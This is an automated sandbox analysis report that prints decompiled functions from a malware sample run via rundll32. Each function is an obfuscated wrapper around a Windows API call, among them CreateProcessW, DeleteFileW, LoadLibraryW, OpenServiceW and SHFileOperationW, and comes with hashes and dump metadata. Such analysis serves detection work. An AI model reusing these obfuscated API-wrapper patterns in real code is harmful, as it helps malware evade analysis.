                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleInformation
                                                                                                                      • String ID: WB
                                                                                                                      • API String ID: 3935143524-2158411504
                                                                                                                      • Opcode ID: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction ID: db53446b367ed6946db1b02cabd9773bf1eb329d5435db39a8a5f378ffd0585e
                                                                                                                      • Opcode Fuzzy Hash: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction Fuzzy Hash: 22112576D01208FBDF10DFA4D946ACEBFB4EB14304F108089F9106A2A0DBB55B64AB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 477 43e689-43e712 call 42cf25 call 422d9f CloseServiceHandle
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E0043E689(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t27;
                                                                                                                      				int _t34;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0042CF25(_t27);
                                                                                                                      				_v8 = 0x8d6642;
                                                                                                                      				_v8 = _v8 >> 0xa;
                                                                                                                      				_v8 = _v8 + 0x9ccb;
                                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                                      				_v8 = _v8 ^ 0x0002819d;
                                                                                                                      				_v16 = 0x6a74c5;
                                                                                                                      				_v16 = _v16 | 0x354c93f6;
                                                                                                                      				_v16 = _v16 ^ 0x356d05ed;
                                                                                                                      				_v12 = 0xe812c4;
                                                                                                                      				_v12 = _v12 * 0x26;
                                                                                                                      				_v12 = _v12 ^ 0x227e2d65;
                                                                                                                      				E00422D9F(0x23833043, 0x1ec, __ecx, 0x1b74c9e2);
                                                                                                                      				_t34 = CloseServiceHandle(_a8); // executed
                                                                                                                      				return _t34;
                                                                                                                      			}








                                                                                                                      APIs
                                                                                                                      • CloseServiceHandle.ADVAPI32(356D05ED), ref: 0043E70D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleService
                                                                                                                      • String ID: e-~"
                                                                                                                      • API String ID: 1725840886-2046105602
                                                                                                                      • Opcode ID: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction ID: 1d7daff24281a6045cd3539cca2e7fb8c544dbab1e90b788b4391d62e068a948
                                                                                                                      • Opcode Fuzzy Hash: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction Fuzzy Hash: AA01E271C0020CFBCB08EFA4D98689EBFB4EB54304F608189E928A6251D7B5AB649F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 482 434dad-434e63 call 42cf25 call 422d9f CloseHandle
                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E00434DAD(void* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				void* _v28;
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				void* _t41;
                                                                                                                      				int _t50;
                                                                                                                      				signed int _t52;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0042CF25(_t41);
                                                                                                                      				_v32 = 0xb76b6b;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_t52 = 0x74;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v16 = 0xdf8814;
                                                                                                                      				_v16 = _v16 | 0xf44f2943;
                                                                                                                      				_v16 = _v16 << 6;
                                                                                                                      				_v16 = _v16 >> 5;
                                                                                                                      				_v16 = _v16 ^ 0x01b79e59;
                                                                                                                      				_v12 = 0x5a8921;
                                                                                                                      				_v12 = _v12 / _t52;
                                                                                                                      				_v12 = _v12 << 0xd;
                                                                                                                      				_v12 = _v12 >> 0xd;
                                                                                                                      				_v12 = _v12 ^ 0x000807b1;
                                                                                                                      				_v8 = 0x5c56e6;
                                                                                                                      				_v8 = _v8 ^ 0x7431396c;
                                                                                                                      				_v8 = _v8 + 0xffff5a5b;
                                                                                                                      				_v8 = _v8 + 0x50a9;
                                                                                                                      				_v8 = _v8 ^ 0x74635491;
                                                                                                                      				E00422D9F(0x25d2a026, 0x1b9, _t52, 0xa62ab78c);
                                                                                                                      				_t50 = CloseHandle(_a4); // executed
                                                                                                                      				return _t50;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(000807B1,?,?,?,?,?,?,?,?,?), ref: 00434E5D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID: l91t
                                                                                                                      • API String ID: 2962429428-3929799471
                                                                                                                      • Opcode ID: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction ID: 6132880a53d56380c5d9db2d72fcc5478463acf8ad225598c49edda6a0f1d8ab
                                                                                                                      • Opcode Fuzzy Hash: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction Fuzzy Hash: B9113476D0060CFFDB05DFE5D84A89EBBB0EB40314F50C088E914A6255D7B99B588F42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E0043679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t40;
                                                                                                                      				int _t46;
                                                                                                                      				WCHAR* _t50;
                                                                                                                      
                                                                                                                      				_push(_a64);
                                                                                                                      				_t50 = __ecx;
                                                                                                                      				_push(_a60);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a48);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a28);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0042CF25(_t40);
                                                                                                                      				_v24 = 0x639852;
                                                                                                                      				_v20 = 0;
                                                                                                                      				_v12 = 0x9647c4;
                                                                                                                      				_v12 = _v12 + 0x4343;
                                                                                                                      				_v12 = _v12 >> 0x10;
                                                                                                                      				_v12 = _v12 ^ 0x0009af77;
                                                                                                                      				_v16 = 0x17e0ca;
                                                                                                                      				_v16 = _v16 >> 4;
                                                                                                                      				_v16 = _v16 ^ 0x000f0fb4;
                                                                                                                      				_v8 = 0x429f7b;
                                                                                                                      				_v8 = _v8 + 0xffff27c2;
                                                                                                                      				_v8 = _v8 + 0xb08b;
                                                                                                                      				_v8 = _v8 ^ 0x004b6691;
                                                                                                                      				E00422D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
                                                                                                                      				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
                                                                                                                      				return _t46;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 0043685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: dcec278cf53e0ceaf0e5164fa6802d2fce67f535b5bd9b4918f5922bacddd0eb
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: 9921E87290024CBBCF119F96CD09CDFBFB9EF99714F008149FA1466160D7B68A64EBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 48%
                                                                                                                      			E0043E938(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, long _a36, WCHAR* _a40) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t34;
                                                                                                                      				void* _t41;
                                                                                                                      				long _t45;
                                                                                                                      				long _t46;
                                                                                                                      
                                                                                                                      				_push(_a40);
                                                                                                                      				_t45 = __edx;
                                                                                                                      				_push(_a36);
                                                                                                                      				_t46 = __ecx;
                                                                                                                      				_push(_a32);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0042CF25(_t34);
                                                                                                                      				_v16 = 0x974c12;
                                                                                                                      				_v16 = _v16 * 0x75;
                                                                                                                      				_v16 = _v16 ^ 0x4529a886;
                                                                                                                      				_v12 = 0x89ee90;
                                                                                                                      				_v12 = _v12 >> 3;
                                                                                                                      				_v12 = _v12 >> 0xd;
                                                                                                                      				_v12 = _v12 ^ 0x0001fd6b;
                                                                                                                      				_v8 = 0x2afb1;
                                                                                                                      				_v8 = _v8 + 0xffff660b;
                                                                                                                      				_v8 = _v8 | 0x1aac0731;
                                                                                                                      				_v8 = _v8 ^ 0x1aae47e7;
                                                                                                                      				E00422D9F(0xb361a139, 0x20d, __ecx, 0xa62ab78c);
                                                                                                                      				_t41 = CreateFileW(_a40, _t45, _a36, 0, _a12, _t46, 0); // executed
                                                                                                                      				return _t41;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 0043E9E0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction ID: ef67e6dccb28940afb23841a3ad3bdbf5fd8fdf783ec0b8419776163acf2de8e
                                                                                                                      • Opcode Fuzzy Hash: 360c415e9015d3d13679f61f4bfb391b888432a2a898910ac906551ddd5173d2
                                                                                                                      • Instruction Fuzzy Hash: A411447690120CBFCF059ED5DC86CDEBFB9EB48358F108098F924A2210D2768A20DF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 71%
                                                                                                                      			E00427A47(long __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t37;
                                                                                                                      				void* _t45;
                                                                                                                      				long _t48;
                                                                                                                      
                                                                                                                      				_push(_a20);
                                                                                                                      				_t48 = __ecx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0042CF25(_t37);
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v24 = 0xfcacd9;
                                                                                                                      				_v8 = 0xc1635f;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 * 0x50;
                                                                                                                      				_v8 = _v8 * 0x36;
                                                                                                                      				_v8 = _v8 ^ 0x197e1637;
                                                                                                                      				_v16 = 0x23fde3;
                                                                                                                      				_v16 = _v16 << 0xf;
                                                                                                                      				_v16 = _v16 + 0x8916;
                                                                                                                      				_v16 = _v16 ^ 0xfef173e1;
                                                                                                                      				_v12 = 0xdffc87;
                                                                                                                      				_v12 = _v12 | 0x0f84fa40;
                                                                                                                      				_v12 = _v12 ^ 0x35513bb9;
                                                                                                                      				_v12 = _v12 ^ 0x3a8da81e;
                                                                                                                      				E00422D9F(0x9afcb52f, 0x1c3, __ecx, 0xa62ab78c);
                                                                                                                      				_t45 = RtlAllocateHeap(_a8, _t48, _a12); // executed
                                                                                                                      				return _t45;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(FEF173E1,00989527,00000000,?,?,?,?,?,?,?,?,?,?,003C356D), ref: 00427AF1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction ID: 8a0033142576b5769e8f4a4e3ecf0f27635884cdf9f4636da00cc4f7bad2f8f8
                                                                                                                      • Opcode Fuzzy Hash: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction Fuzzy Hash: 7B11E2B2C0121CFBDF05DF95DA4A8EEBBB4EB14304F14C099E9116A251D7B15B24AF51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 67%
                                                                                                                      			E00422E96(void* __ecx, void* __edx, intOrPtr _a4, int _a8, intOrPtr _a12, short* _a16, void* _a20) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				void* _t35;
                                                                                                                      				void* _t42;
                                                                                                                      
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0042CF25(_t35);
                                                                                                                      				_v16 = 0xae7ad3;
                                                                                                                      				_v16 = _v16 >> 6;
                                                                                                                      				_v16 = _v16 >> 9;
                                                                                                                      				_v16 = _v16 ^ 0x000b5401;
                                                                                                                      				_v12 = 0xf75da6;
                                                                                                                      				_v12 = _v12 >> 7;
                                                                                                                      				_v12 = _v12 + 0xa35c;
                                                                                                                      				_v12 = _v12 ^ 0x00021a7e;
                                                                                                                      				_v8 = 0xb7fdd7;
                                                                                                                      				_v8 = _v8 * 0x34;
                                                                                                                      				_v8 = _v8 >> 7;
                                                                                                                      				_v8 = _v8 | 0x8cd68937;
                                                                                                                      				_v8 = _v8 ^ 0x8cd3b3e5;
                                                                                                                      				E00422D9F(0x53eee54a, 0xc3, __ecx, 0x1b74c9e2);
                                                                                                                      				_t42 = OpenServiceW(_a20, _a16, _a8); // executed
                                                                                                                      				return _t42;
                                                                                                                      			}








                                                                                                                      APIs
                                                                                                                      • OpenServiceW.ADVAPI32(?,?,000B5401), ref: 00422F2E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenService
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3098006287-0
                                                                                                                      • Opcode ID: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction ID: 2bc3f13ef541f475a14062be399deda5aa4887bd2a8b7d95882793f74ea42439
                                                                                                                      • Opcode Fuzzy Hash: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction Fuzzy Hash: 7011CE72D0121CFBCF05DFE4D94A88DBBB1EB14308F20C099F915A6261E3769B64AF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0042BAB0(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t30;
                                                                                                                      				int _t37;
                                                                                                                      				WCHAR* _t40;
                                                                                                                      
                                                                                                                      				_push(_a4);
                                                                                                                      				_t40 = __ecx;
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0042CF25(_t30);
                                                                                                                      				_v12 = 0xf8a4b;
                                                                                                                      				_v12 = _v12 >> 2;
                                                                                                                      				_v12 = _v12 ^ 0xa9327f6f;
                                                                                                                      				_v12 = _v12 ^ 0x26166746;
                                                                                                                      				_v12 = _v12 ^ 0x8f266abd;
                                                                                                                      				_v16 = 0xc512b4;
                                                                                                                      				_v16 = _v16 ^ 0xa05564f8;
                                                                                                                      				_v16 = _v16 | 0x9f0a4514;
                                                                                                                      				_v16 = _v16 ^ 0xbf9c633f;
                                                                                                                      				_v8 = 0x850486;
                                                                                                                      				_v8 = _v8 * 0x26;
                                                                                                                      				_v8 = _v8 + 0xffff9e70;
                                                                                                                      				_v8 = _v8 >> 0xf;
                                                                                                                      				_v8 = _v8 ^ 0x00077990;
                                                                                                                      				E00422D9F(0x7bb5ca56, 0xa2, __ecx, 0xa62ab78c);
                                                                                                                      				_t37 = DeleteFileW(_t40); // executed
                                                                                                                      				return _t37;
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction ID: 831d266f3dd318c67631377d205fc38affd236e0c3628ecd4fb17a4fa6c9a49e
                                                                                                                      • Opcode Fuzzy Hash: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction Fuzzy Hash: 0F010574D01218BBDB54EFA5C98A4DEBFB4EF00304F20C189E825AA211D7B41B45DF96
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E004407D7(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t30;
                                                                                                                      				struct HINSTANCE__* _t39;
                                                                                                                      				signed int _t41;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0042CF25(_t30);
                                                                                                                      				_v12 = 0x89457d;
                                                                                                                      				_v12 = _v12 ^ 0x6b886c65;
                                                                                                                      				_v12 = _v12 | 0xf6315bef;
                                                                                                                      				_v12 = _v12 ^ 0xff319cd3;
                                                                                                                      				_v8 = 0xe31a0f;
                                                                                                                      				_t41 = 0xa;
                                                                                                                      				_v8 = _v8 * 0x1b;
                                                                                                                      				_v8 = _v8 << 5;
                                                                                                                      				_v8 = _v8 ^ 0xfe799add;
                                                                                                                      				_v16 = 0x93f3d7;
                                                                                                                      				_v16 = _v16 / _t41;
                                                                                                                      				_v16 = _v16 ^ 0x00076e75;
                                                                                                                      				E00422D9F(0xe1be5824, 0x1e6, _t41, 0xa62ab78c);
                                                                                                                      				_t39 = LoadLibraryW(_a4); // executed
                                                                                                                      				return _t39;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(FF319CD3), ref: 00440861
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction ID: 4ebf51cba1d7718c506d25234c901299a2f7bda2c993fa3b9f1131ce921fbb43
                                                                                                                      • Opcode Fuzzy Hash: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction Fuzzy Hash: 9D012275D0520CFFCB08EFE4D98A98EBFB1EB40304F60C099E915AB261E7B55B549B44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E0043E2C5(void* __ecx, void* __edx, intOrPtr _a4, struct _SHFILEOPSTRUCTW* _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				void* _t30;
                                                                                                                      				int _t37;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0042CF25(_t30);
                                                                                                                      				_v16 = 0x8c64b0;
                                                                                                                      				_v16 = _v16 + 0x962b;
                                                                                                                      				_v16 = _v16 >> 8;
                                                                                                                      				_v16 = _v16 ^ 0x000da62a;
                                                                                                                      				_v12 = 0xb02c29;
                                                                                                                      				_v12 = _v12 * 0x73;
                                                                                                                      				_v12 = _v12 + 0xffff997c;
                                                                                                                      				_v12 = _v12 ^ 0x4f272bd9;
                                                                                                                      				_v8 = 0x94952e;
                                                                                                                      				_v8 = _v8 + 0xa237;
                                                                                                                      				_v8 = _v8 ^ 0xcd764018;
                                                                                                                      				_v8 = _v8 + 0x8874;
                                                                                                                      				_v8 = _v8 ^ 0xcdeaa0fe;
                                                                                                                      				E00422D9F(0x2326b427, 0x2d, __ecx, 0xe4d0349b);
                                                                                                                      				_t37 = SHFileOperationW(_a8); // executed
                                                                                                                      				return _t37;
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • SHFileOperationW.SHELL32(000DA62A), ref: 0043E354
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileOperation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3080627654-0
                                                                                                                      • Opcode ID: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction ID: 4d71fc07d90306f0274edaf008d109402d71a9aff5a76df7df67c4c4bde58ec3
                                                                                                                      • Opcode Fuzzy Hash: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction Fuzzy Hash: F00113B1D00308FBDF51DFE9E94A88DBBB0EF00318F60C189E81466251EBB98B589F05
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00433CBB() {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _t37;
                                                                                                                      
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v24 = 0x868838;
                                                                                                                      				_v16 = 0xb6c7ac;
                                                                                                                      				_t37 = 0x79;
                                                                                                                      				_v16 = _v16 * 0x7d;
                                                                                                                      				_v16 = _v16 ^ 0x593c5b8b;
                                                                                                                      				_v8 = 0x23929;
                                                                                                                      				_v8 = _v8 | 0xd856564b;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 >> 1;
                                                                                                                      				_v8 = _v8 ^ 0x67f2afdd;
                                                                                                                      				_v12 = 0x42ac5b;
                                                                                                                      				_v12 = _v12 / _t37;
                                                                                                                      				_v12 = _v12 ^ 0x0009f0c4;
                                                                                                                      				E00422D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
                                                                                                                      				ExitProcess(0);
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00433D3B
                                                                                                                      Memory Dump Source
